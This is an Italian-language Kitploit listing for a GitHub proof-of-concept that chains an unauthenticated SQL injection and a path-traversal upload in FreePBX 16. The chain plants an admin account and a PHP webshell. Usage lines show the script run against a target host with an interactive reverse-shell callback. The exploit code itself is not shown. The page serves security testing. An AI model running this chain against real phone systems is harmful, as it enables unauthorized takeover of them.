Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
FreePBX-CVE-2025-57819-RCE — # Catena di exploit per FreePBX 16: SQL injection non autenticata e upload arbitrario di file Catena di exploit composta da SQL injection non autenticata e upload arbitrario di file per FreePBX 16, che consente l'esecuzione remota di codice tramite la creazione di un account amministratore e il deployment di una webshell. | Kitploit
Strumenti/GitHubGitHub/0xehab/freepbx-cve-2025-57819-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHub0xehab/freepbx-cve-2025-57819-rce

FreePBX-CVE-2025-57819-RCE

Vedi Repository
1313 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

# Catena di exploit per FreePBX 16: SQL injection non autenticata e upload arbitrario di file Catena di exploit composta da SQL injection non autenticata e upload arbitrario di file per FreePBX 16, che consente l'esecuzione remota di codice tramite la creazione di un account amministratore e il deployment di una webshell.

Condividi

FreePBX 16 — SQLi non autenticata a RCE

Proof-of-concept exploit che incatena due vulnerabilità di FreePBX per passare da accesso zero a esecuzione di codice remoto su FreePBX 16.

CVEComponenteImpatto
CVE-2025-57819Caricatore del modulo Endpoint (parametro brand)SQL injection impilata non autenticata
CVE-2025-61678Caricatore firmware di Endpoint Manager (parametro fwbrand)Caricamento arbitrario di file autenticato (path traversal)

Come funziona

  1. Creare un admin (CVE-2025-57819) — viene utilizzata una SQL injection impilata raggiungibile senza autenticazione tramite il caricatore dell'endpoint con namespace per INSERT un amministratore con accesso completo direttamente nella tabella ampusers.
  2. Autenticarsi — il PoC effettua l'accesso al pannello di amministrazione come utente appena creato.
  3. Caricare una webshell (CVE-2025-61678) — il gestore di caricamento firmware di Endpoint Manager viene abusato con un path traversal ../../../var/www/html/<dir> in fwbrand per scrivere una webshell PHP nella root web.
  4. Eseguire — esegui un singolo comando o ricevi una reverse shell interattiva.

Versioni affette

FreePBX 16 (modulo Endpoint precedente a 16.0.92). Patchato anche in 17.0.6. Aggiornare a una versione corretta.

Utilizzo

root@kitploit:~
# single command
python3 exploit.py --rhost pbx.example.com --command "id"

# interactive reverse shell (auto-listener via pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444

# plain HTTP / custom port
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"

Opzioni

FlagDescrizione
--rhostHost target (richiesto)
--rportPorta target (default 443)
--httpUsa HTTP invece di HTTPS
--lhost / --lportIndirizzo di callback della reverse shell
--commandEsegui un singolo comando invece di una shell

Requisiti

root@kitploit:~
pip install requests pwntools

Dichiarazione di non responsabilità

Solo per test di sicurezza autorizzati e scopi educativi. Usalo esclusivamente su sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta per testarli. L'autore non si assume alcuna responsabilità per un uso improprio.

Parole chiave

FreePBX · FreePBX 16 · FreePBX 16.0.40.7 · Sangoma PBX · Asterisk · CVE-2025-57819 · CVE-2025-61678 · SQL injection non autenticata · iniezione di query impilata · modulo endpoint · Endpoint Manager · caricamento file autenticato · path traversal · esecuzione di codice remoto · RCE · PoC · exploit · sicurezza VoIP


linkedin: ehxb · medium.com/@Ehxb · github 0xEhxb

Scarica lo strumento